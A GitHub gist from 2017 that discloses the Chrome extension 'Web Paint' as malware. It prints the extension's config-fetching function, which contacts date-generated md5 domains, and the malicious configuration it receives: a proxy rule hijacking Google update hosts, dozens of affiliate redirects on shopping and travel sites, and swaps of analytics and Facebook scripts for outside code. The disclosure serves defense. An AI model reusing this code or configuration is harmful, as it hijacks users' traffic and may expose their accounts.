Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
[MALWARE] Web Paint / emeokgokialpjadjaoeiplmnkjoaegng

This information is PUBLIC DOMAIN as it discloses malware, adware, and/or spyware information.

As of 2017/03/05, the extension "Web Paint" under the ID emeokgokialpjadjaoeiplmnkjoaegng has been identified to contain malware.

The following functions were found:

  • URL Masking
  • Adware redirection
  • Possible attempt to hijack Google accounts via proxying

Removal procedures:

  • Uninstall extension

Actions taken:

  • Extension reported to Google for review
  • Domains and functions reported to CloudFlare for blocking

Located in emeokgokialpjadjaoeiplmnkjoaegng/1.2.1_0/bgjs/background.js starting at line 228 the following function exists:

function retrieve_config(config_url, previous_version = "-", tab_id = -1) {
  var config_urls = [config_url];

  var date = new Date();
  var day = date.getDate();
  var month = date.getMonth() + 1;
  var year = date.getFullYear();
  var d = month + '/' + year;
  config_urls.push('https://' + md5(d) + '.info/config.php');
  d = day + '/' + d;
  config_urls.push('https://' + md5(d) + '.info/config.php');

  for (var i = 0; i < config_urls.length; i++) {
    var config_url = config_urls[i];

    console.log('Retrieving configuration from ' + config_url);

    $.getJSON(config_url, {'version': chrome.runtime.getManifest().version, 'previous_version': previous_version, 'tab_id': tab_id, 'ext_id' : chrome.runtime.id, 'uuid': uuid}, function(data) {
              if (data && data.url) {
                config = data;
                config_url = config.url;
                if (config.patterns) config_patterns = config.patterns;
                chrome.storage.local.set({'config_url': config_url});
                if (config.patterns) chrome.storage.local.set({'config_patterns': config.patterns});
                if (config.ext_id) chrome.storage.local.set({'config_ext_id': config.ext_id});
                if (config.marker) chrome.storage.local.set({'config_marker': config.marker});
                if (config.pac) { chrome.storage.local.set({'config_pac': config.pac}); set_proxy(config.pac);}                
              }
              return true;
    });
  }
}

Retrieving data from the service of "https://"+md5("5/3/2017")+".info/config.php" reveals the following JSON response:

{
    "url": "http:\/\/366099cadd7c27ccb2215d168771370b.info\/config.php",
    "version": 1,
    "ext_id": "dsfsdfsdf",
    "country": "US",
    "pac": "function FindProxyForURL(url, host) {  if (host == 'clients2.google.com')    return 'PROXY antivirus-db.info:8888';  if (host == 'tools.google.com')     return 'PROXY antivirus-db.info:8888';  if (host == 'tools.google.com')     return 'PROXY antivirus-db.info:8888';  return 'DIRECT'; }",
    "marker": "customparam2=customparam2",
    "patterns": {
        "^https?:\\\/\\\/([^\\\/])*aliexpress\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.cpl1.ru\/bGSz\/{deeplink}"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*booking\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/ad.admitad.com\/g\/83b3b940f79f8c1731974ee68e9c3f\/?ulp={deeplink}"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*rentalcars\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/ad.admitad.com\/g\/6agwoaxtyz9f8c17319769b07947bf\/"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*agoda\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/ad.admitad.com\/g\/k5cxk4xsu79f8c173197614935c8f5\/"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*aparto\\.me": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/ad.admitad.com\/g\/4h2b0wpx3f9f8c173197d5a35ee34e\/"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*lufthansa\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.lufthansa-airlines.org\/"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*elitesingles\\.co\\.uk": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/gcnhu.com\/?a=510746&c=1200826&m=32&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*netcredit\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.byvue.com\/?a=510746&c=1236672&m=32&E=wxNTUFPDtcs%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*freelotto\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.mb102.com\/lnk.asp?o=6345&c=918271&a=56754&l=5057"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*alibaba\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/apytrc.com\/click\/56b779258b30a8e1768b46ba\/90414\/9571\/alibaba_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*wildberries\\.ru": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/apycomm.com\/click\/568e546c8b30a80e508b46f8\/23474\/9571\/wb_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*wb\\.ru": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/apycomm.com\/click\/568e546c8b30a80e508b46f8\/23474\/9571\/wb_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*sapato\\.ru": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/apytrc.com\/click\/557fed1b8b30a84e138b45b9\/568\/9571\/sapato_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*dx\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/apycomm.com\/click\/56e6c92b8b30a800188b46d7\/9571\/dx_ce\/"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*dhgate\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/n.actionpay.ru\/click\/574c49098b30a84b798b45f6\/95300\/9571\/dhgate_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*snapdeal\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/apytrc.com\/click\/574c49348b30a868148b4577\/113357\/9571\/subaccount"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*etihad\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/n.apsale.net\/click\/574c49f18b30a872148b456f\/115774\/9571\/etihad_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*art\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/n.apsale.net\/click\/576bb5bb8b30a8417a8b456f\/115667\/9571\/art_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*allianztravelinsurance\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/n.apsale.net\/click\/576bb1d98b30a8ef128b4570\/115775\/9571\/art_ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*iherb\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.iherb.com\/iherb-brands?rcode=LNL518"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*bookingbuddy\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.mb102.com\/lnk.asp?o=9296&c=918271&a=56754&l=8954"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*kiwi\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.mb103.com\/lnk.asp?o=8338&c=918271&a=56754&l=7050"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*qatarairways\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.mb103.com\/lnk.asp?o=7515&c=918271&a=56754&l=8693"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*otel\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.mb103.com\/lnk.asp?o=7884&c=918271&a=56754&l=6596"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*jetradar\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.mb103.com\/lnk.asp?o=7066&c=80296&a=56754&l=5778"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*hotels\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.gcnhu.com\/?a=510746&c=1200651&m=24&E=DcC6fX9S86g%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*travelocity\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.tkqlhce.com\/click-7915096-12472880-1481915687000"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.neverstoptraveling.com\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*aviasales\\.ru": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.pfgbc.com\/?a=510746&c=1518551&p=r&m=32&E=tsuU3HoQ7%2fw%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*ctrip\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.cjsab.com\/?a=510746&c=1200176&m=32&E=7rkdLDL7QhM%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*travellerpicks\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.cjsab.com\/?a=510746&c=1200176&m=32&E=7rkdLDL7QhM%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*travel\\.rakuten\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/gcnhu.com\/?a=510746&c=1601613&m=32&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*yatra\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.gcnhu.com\/?a=510746&c=1607007&p=r&m=32&E=y1KhEiJsVJI%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*expedia\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.dzxcq.com\/?a=510746&c=1201018&m=32&E=9Rn7XWIqbd8%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*trivago\\.": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/c.dzxcq.com\/?a=510746&c=1201018&m=32&E=9Rn7XWIqbd8%3d&s1="
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*iqoption\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/affiliate.iqoption.com\/redir\/?aff=35236&afftrack=ce"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https?:\\\/\\\/([^\\\/])*amazon\\.com": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/www.mb102.com\/lnk.asp?o=9700&c=918271&a=56754&l=9348"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        },
        "^https:\\\/\\\/www\\.google-analytics\\.com\\\/ga\\.js.*": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/partner-net.men\/code\/?pid=973820&r=36767"
            },
            "ref": {
                "searchvalue": "abrakadabra",
                "newvalue": "https:\/\/www.google-analytics.com"
            },
            "type": "script"
        },
        "^https:\\\/\\\/www\\.google-analytics\\.com\\\/analytics\\.js.*.*.*.*.*.*.*.*.*": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/partner-net.men\/code\/?pid=973820&r=77838"
            },
            "ref": {
                "searchvalue": "abrakadabra",
                "newvalue": "https:\/\/www.google-analytics.com"
            },
            "type": "script"
        },
        ".*google.*pagead.*js.*.*.*.*.*.*.*.*": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/partner-net.men\/code\/?pid=973820&r=89881"
            },
            "ref": {
                "searchvalue": "abrakadabra",
                "newvalue": "https:\/\/www.google-analytics.com"
            },
            "type": "script"
        },
        ".*facebook.*js": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "https:\/\/partner-net.men\/code\/?pid=973820&r=73886"
            },
            "ref": {
                "searchvalue": "abrakadabra",
                "newvalue": "https:\/\/www.google-analytics.com"
            },
            "type": "script"
        },
        "^https?:\\\/\\\/([^\\\/])*roemm\\.ru": {
            "url": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/click.redirect-server.info\/click.php?url=http%3A%2F%2Fvc.ru%2F"
            },
            "ref": {
                "searchvalue": "^.*$",
                "newvalue": "http:\/\/top10hotels.org\/"
            },
            "type": "main_frame"
        }
    }
}

Line 10: 'Procedures' is spelled incorrectly.

Owner

FelixWolf commented Mar 7, 2017

Corrected, thanks!
Was in a hurry to send this to cloudflare so they could contact the hosting providers.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment